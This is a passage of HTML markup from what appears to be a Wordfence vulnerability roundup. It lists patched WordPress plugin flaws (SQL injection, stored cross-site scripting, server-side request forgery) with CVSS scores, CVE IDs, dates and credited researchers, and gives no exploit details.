		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ca06c0-6a7d-43ee-ac59-698e0f525e23" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/746eec41-e8d2-4c51-b63e-726eeadbb2ab" target="_blank" rel="noopener">Taskbuilder &lt;= 5.0.9 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15267" target="_blank" rel="noopener noreferrer">							CVE-2026-15267						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/taskbuilder" target="_blank" rel="noopener">Taskbuilder – Project Management &amp; Task Management Tool With Kanban Board</a> <span class="wfvr-software-slug">[taskbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/48c75fb70feac5c77a422be7b9c6a1f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="48c75fb70feac5c77a422be7b9c6a1f8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/non-nss" target="_blank" rel="noopener">zalomkiller</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/746eec41-e8d2-4c51-b63e-726eeadbb2ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0d562f-cf21-487b-8386-066d24bdbb13" target="_blank" rel="noopener">WP Hotel Booking &lt; 2.3.2 &#8211; Authenticated (Custom role+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15153" target="_blank" rel="noopener noreferrer">							CVE-2026-15153						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">WP Hotel Booking</a> <span class="wfvr-software-slug">[wp-hotel-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0d562f-cf21-487b-8386-066d24bdbb13" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50eef578-9094-47ac-a451-04ebd9e6e2f8" target="_blank" rel="noopener">Advanced Woo Labels &lt;= 2.48 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;bg_color&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15662" target="_blank" rel="noopener noreferrer">							CVE-2026-15662						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-woo-labels" target="_blank" rel="noopener">Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce</a> <span class="wfvr-software-slug">[advanced-woo-labels]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50eef578-9094-47ac-a451-04ebd9e6e2f8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/313613ea-18cf-4e7d-aa75-586b80752edb" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates &lt; 2.7.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13330" target="_blank" rel="noopener noreferrer">							CVE-2026-13330						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</a> <span class="wfvr-software-slug">[animation-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/313613ea-18cf-4e7d-aa75-586b80752edb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f06b745-8968-41cb-96b0-ff0f42af114d" target="_blank" rel="noopener">Auto Featured Image (Auto Post Thumbnail) &lt;= 5.0.4 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61970" target="_blank" rel="noopener noreferrer">							CVE-2026-61970						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail" target="_blank" rel="noopener">Auto Featured Image (Auto Post Thumbnail)</a> <span class="wfvr-software-slug">[auto-post-thumbnail]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f06b745-8968-41cb-96b0-ff0f42af114d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93060cf-2df3-4d45-a1f2-304f443d58bc" target="_blank" rel="noopener">Booking System Trafft &lt;= 1.0.17 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8791" target="_blank" rel="noopener noreferrer">							CVE-2026-8791						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system-trafft" target="_blank" rel="noopener">Booking System Trafft</a> <span class="wfvr-software-slug">[booking-system-trafft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bbe3fab00912827f35b45e537ae8af7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bbe3fab00912827f35b45e537ae8af7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener">Hardik Patel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93060cf-2df3-4d45-a1f2-304f443d58bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/200f6173-72cd-4bf7-86b7-f5308b84364b" target="_blank" rel="noopener">Business Directory Plugin – Easy Listing Directories for WordPress &lt;= 6.4.24 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61959" target="_blank" rel="noopener noreferrer">							CVE-2026-61959						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/business-directory-plugin" target="_blank" rel="noopener">Business Directory Plugin – Easy Listing Directories for WordPress</a> <span class="wfvr-software-slug">[business-directory-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ee168e3ec0bb91083d6bb57a00e229.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ee168e3ec0bb91083d6bb57a00e229"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener">Mukhlis Amien</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/200f6173-72cd-4bf7-86b7-f5308b84364b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f5390b1-c85b-4bf6-ab38-6ae0efe72ffa" target="_blank" rel="noopener">Contact Form to Any API &lt;= 3.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;cf7anyapi_form_field&#8217; Post Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15735" target="_blank" rel="noopener noreferrer">							CVE-2026-15735						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-any-api" target="_blank" rel="noopener">Contact Form to Any API</a> <span class="wfvr-software-slug">[contact-form-to-any-api]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f5390b1-c85b-4bf6-ab38-6ae0efe72ffa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc751980-987f-49c5-a9fb-16ba219c174a" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;layoutCircle.alignment&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15950" target="_blank" rel="noopener noreferrer">							CVE-2026-15950						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc751980-987f-49c5-a9fb-16ba219c174a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93de7ae-c3a8-4536-9c07-e64d7746e05f" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;postMeta.font.size&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15393" target="_blank" rel="noopener noreferrer">							CVE-2026-15393						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93de7ae-c3a8-4536-9c07-e64d7746e05f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a32393e-f233-4ab6-addc-9dd1e04c0e0a" target="_blank" rel="noopener">Download Manager &lt;= 3.3.66 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;icon&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16685" target="_blank" rel="noopener noreferrer">							CVE-2026-16685						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">Download Manager</a> <span class="wfvr-software-slug">[download-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a32393e-f233-4ab6-addc-9dd1e04c0e0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02103a32-4fac-401a-b995-e86dd734484b" target="_blank" rel="noopener">Easy Property Listings &lt;= 3.5.24 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;facebook&#8217; User Contact Method</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16684" target="_blank" rel="noopener noreferrer">							CVE-2026-16684						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-property-listings" target="_blank" rel="noopener">Easy Property Listings</a> <span class="wfvr-software-slug">[easy-property-listings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02103a32-4fac-401a-b995-e86dd734484b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddb9c46-683d-4eb4-a30f-f492d4f3ae2d" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets &lt; 6.6.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13344" target="_blank" rel="noopener noreferrer">							CVE-2026-13344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddb9c46-683d-4eb4-a30f-f492d4f3ae2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9d66db-53a8-4d93-9222-6f9649a7d842" target="_blank" rel="noopener">Exclusive Addons for Elementor &lt;= 2.7.9.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;exad_infobox_image&#8217;</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12231" target="_blank" rel="noopener noreferrer">							CVE-2026-12231						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">Exclusive Addons for Elementor</a> <span class="wfvr-software-slug">[exclusive-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
